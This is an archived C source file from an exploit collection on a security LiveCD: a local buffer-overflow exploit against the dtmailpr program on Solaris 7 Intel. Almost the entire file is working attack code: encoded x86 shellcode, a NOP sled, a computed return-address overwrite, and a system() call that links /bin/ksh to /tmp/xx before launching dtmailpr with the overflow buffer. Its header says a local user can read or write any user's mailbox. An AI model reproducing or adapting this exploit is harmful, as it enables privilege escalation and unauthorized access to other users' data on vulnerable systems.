home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / dtmailpr.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  2KB  |  57 lines

  1. /*=============================================================================
  2.    Solaris dtmailpr exploit for Solaris7 Intel Edition
  3.    The Shadow Penguin Security (http://shadowpenguin.backsection.net)
  4.    Written by UNYUN  (shadowpenguin@backsection.net)
  5.    Descripton:
  6.      Local user can read/write any user's mailbox
  7.   =============================================================================
  8. */
  9.  
  10. #include <stdio.h>
  11.  
  12. #define RETADR  1266
  13. #define RETOFS  0x1d88
  14. #define EXPADR  300
  15. #define NOP 0x90
  16. #define MAXBUF  2000
  17.  
  18. unsigned long get_sp(void)
  19. {
  20.   __asm__(" movl %esp,%eax ");
  21. }
  22.  
  23. char exploit_code[2000] =
  24.   "\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"
  25.   "\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"
  26.   "\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"
  27.   "\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"
  28.   "\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"
  29.   "\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"
  30.   "\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"
  31.   "\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"
  32.   "\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"
  33.   "\x04\xe8\xc9\xff\xff\xff/tmp/xx";
  34.  
  35. main()
  36. {
  37.   static char     buf[MAXBUF+1000];
  38.   FILE        *fp;
  39.   unsigned int    i,ip,sp;
  40.  
  41.   putenv("LANG=");
  42.   sp=get_sp();
  43.   system("ln -s /bin/ksh /tmp/xx");
  44.   printf("esp  = 0x%x\n",sp);
  45.   memset(buf,NOP,MAXBUF);
  46.   ip=sp-RETOFS;
  47.   printf("eip  = 0x%x\n",ip);
  48.   buf[RETADR  ]=ip&0xff;
  49.   buf[RETADR+1]=(ip>>8)&0xff;
  50.   buf[RETADR+2]=(ip>>16)&0xff;
  51.   buf[RETADR+3]=(ip>>24)&0xff;
  52.   strncpy(buf+EXPADR,exploit_code,strlen(exploit_code));
  53.   buf[MAXBUF-1]=0;
  54.   execl("/usr/dt/bin/dtmailpr","dtmailpr","-f",buf,0);
  55. }
  56.  
  57.